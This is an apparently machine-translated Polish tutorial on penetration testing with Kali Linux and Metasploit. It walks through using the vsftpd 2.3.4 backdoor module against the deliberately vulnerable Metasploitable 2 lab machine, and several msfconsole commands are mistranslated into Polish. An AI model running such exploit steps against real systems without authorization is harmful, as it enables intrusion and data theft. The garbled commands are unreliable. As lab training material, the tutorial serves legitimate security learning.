Metasploit w Kali Linux Top 10top 10

Metasploit w Kali Linux Top 10top 10

Testowanie penetracji z Kali Linux


Internet jest pełen czacza o złośliwych zamiarach, którzy chcą uzyskać dostęp do sieci i wykorzystać swoje dane, jednocześnie unikanie wykrywania. Sensowne jest tylko zapewnienie bezpieczeństwa sieci poprzez mierzenie ich luk w zabezpieczeniach. Testowanie penetracji lub hakowanie etyczne to sposób, w jaki testujemy sieci lub serwery pod kątem celów ciąży, wskazując wszystkie możliwe naruszenia, których haker może użyć do uzyskania dostępu, zmniejszając w ten sposób kompromisy bezpieczeństwa. Testy penetracyjne są często przeprowadzane za pośrednictwem aplikacji, z których najpopularniejszym jest Kali Linux, najlepiej z Framework Metasploit. Trzymaj się do końca, aby nauczyć się testować system, wykonując atak z Kali Linux.

Wprowadzenie do Kali Linux i Metasploit Framework

Kali Linux jest jednym z wielu zaawansowanych narzędzi bezpieczeństwa systemu opracowanych (i regularnie aktualizowanych) przez ofensywne bezpieczeństwo. Jest to system operacyjny oparty na Linuksie, który jest wyposażony w zestaw narzędzi opracowany głównie do testowania penetracji. Jest to dość łatwe w użyciu (przynajmniej w porównaniu z innymi programami testowania pióra) i wystarczająco skomplikowane, aby przedstawić odpowiednie wyniki.

Metasploit Framework jest platformą testowania modułowego przenikania modułowego, używana do atakowania systemów do testowania wykorzystywania bezpieczeństwa. Jest to jedno z najczęściej używanych narzędzi do testowania penetracji i jest wbudowane w Kali Linux.

Metasploit składa się z magazynu danych i modułów. DataStore umożliwia użytkownikowi skonfigurowanie aspektów w ramach, podczas gdy moduły to samodzielne fragmenty kodów, z których metasploit wywodzi się. Ponieważ koncentrujemy się na wykonaniu ataku na testowanie pióra, będziemy prowadzić dyskusję na temat modułów.

W sumie istnieje pięć modułów:

Wykorzystać - unika wykrywania, włamuje się do systemu i przesyła moduł ładunku
Ładunek - Umożliwia użytkownikowi dostęp do systemu
Pomocniczy -obsługuje naruszenie poprzez wykonywanie zadań niezwiązanych z wyzyskiem
Post-Eksploatacja - umożliwia dalszy dostęp do już zagrożonego systemu
Nop generator - służy do ominięcia IPS bezpieczeństwa

Do naszych celów będziemy korzystać z modułów exploit i ładunku, aby uzyskać dostęp do naszego systemu docelowego.

Konfigurowanie laboratorium testowania pióra

Potrzebujemy następującego oprogramowania:

Kali Linux:

Kali Linux będzie obsługiwany z naszego lokalnego sprzętu. Będziemy używać jego ram Metasploit do zlokalizowania exploitów.

Hiperwizor:

Będziemy potrzebować hiperwizora, ponieważ pozwala nam to stworzyć maszyna wirtualna, który pozwala nam jednocześnie pracować nad więcej niż jednym systemem operacyjnym. Jest to niezbędny warunek testowania penetracji. Aby uzyskać płynne żeglarstwo i lepsze wyniki, zalecamy użycie jednego z nich VirtualBox Lub Microsoft Hyper-V Aby utworzyć maszynę wirtualną.

Metasploible 2

Nie mylić z Metasploit, który jest ramą w Kali Linux, Metasploitable jest celowo wrażliwą wirtualną maszyną zaprogramowaną do szkolenia specjalistów ds. Bezpieczeństwa cybernetycznego. Metasploitable 2 ma mnóstwo znanych testowalnych luk, które możemy wykorzystać, a w Internecie jest wystarczająca ilość informacji, aby pomóc nam zacząć.

Chociaż atakowanie wirtualnego systemu w metasploitable 2 jest łatwe, ponieważ luki są dobrze udokumentowane, będziesz potrzebować znacznie większej wiedzy specjalistycznej i cierpliwości w prawdziwych maszynach i sieciach, dla których ostatecznie wykonasz test penetracji. Ale użycie metasploita 2 do testowania pióra służy jako doskonały punkt wyjścia do poznania metody.

Użyjemy metasploitale 2 do dalszego testowania pióra. Nie potrzebujesz dużo pamięci komputera do pracy tej wirtualnej maszyny, przestrzeń dysku twardego 10 GB i 512 MB pamięci RAM powinna zrobić dobrze. Pamiętaj tylko, aby zmienić ustawienia sieciowe dla metasploitable na adapter tylko hosta podczas instalowania. Po zainstalowaniu uruchom metasploitable i zaloguj się. Startup Kali Linux, abyśmy mogli działać Framework Metasploit, aby zainicjować nasze testy.

Wykorzystanie VSFTPD V2.3.4 Wykonywanie polecenia Backdoor

Mając wszystko na ich miejscu, możemy w końcu szukać wrażliwości na wykorzystanie. Możesz poszukać sieci w poszukiwaniu różnych luk, ale w tym samouczku zobaczymy, jak VSFTPD V2.3.4 można wykorzystać. VSFTPD oznacza bardzo bezpieczny demon FTP. Wybieraliśmy ten, ponieważ zapewnia on pełny dostęp do interfejsu Metasploitale bez szukania pozwolenia.

Uruchom konsolę metasploit. Przejdź do wiersza polecenia w Kali Linux i wprowadź następujący kod:

$ sudo msfconsole

Z otwartą konsolą Wpisz:

$ Search vsftpd

To wywołuje lokalizację podatności, którą chcemy wykorzystać. Aby go wybrać, wpisz

$ Użyj exploit/unix/ftp/vsftpd_234_backdoor

Aby zobaczyć, jakie dalsze informacje są wymagane do uruchomienia wykorzystania, wpisz

$ show opcje

Jedyną informacją o dowolnym istotnym znaczeniu, którego brakuje.

Poszukaj adresu IP w metasploitable, wpisując

$ ifconfig

W jego poleceniu

Adres IP znajduje się na początku drugiej linii, coś w stylu

# inet addr: 10.0.2.15

Wpisz w tym poleceniu, aby kierować metasploit do systemu docelowego i rozpocząć exploit. Używam mojego adresu IP, ale spowoduje to jednak błąd, jeśli użyjesz innej ofiary IP, otrzymasz wyniki z exploit

$ set Rhost [ofiara IP]
$ run

Teraz, mając pełny dostęp do metasploitable, możemy poruszać się po systemie bez żadnych ograniczeń. Możesz pobrać dowolne sklasyfikowane dane lub usunąć wszystko, co ważne z serwera. W prawdziwych sytuacjach, w których Blackhat zyskuje dostęp do takiego serwera, mogą nawet zamknąć procesor, powodując awarię wszelkich innych komputerów.

Owinięcie rzeczy

Lepiej jest wcześniej wyeliminować problemy, niż na nie reagować. Testy penetracji mogą zaoszczędzić dużo kłopotów i nadrabiania zaległości, jeśli chodzi o bezpieczeństwo systemów, czy to pojedynczy komputerowy komputer, czy cała sieć. Mając to na uwadze, pomocne jest posiadanie podstawowej wiedzy na temat testowania pióra. Metasploitable to doskonałe narzędzie do nauki jego niezbędnych, ponieważ jego luki są dobrze znane, więc istnieje wiele informacji na ten temat. Pracowaliśmy tylko nad jednym exploitem z Kali Linux, ale gorąco polecamy, abyś mógł się na nie spojrzeć.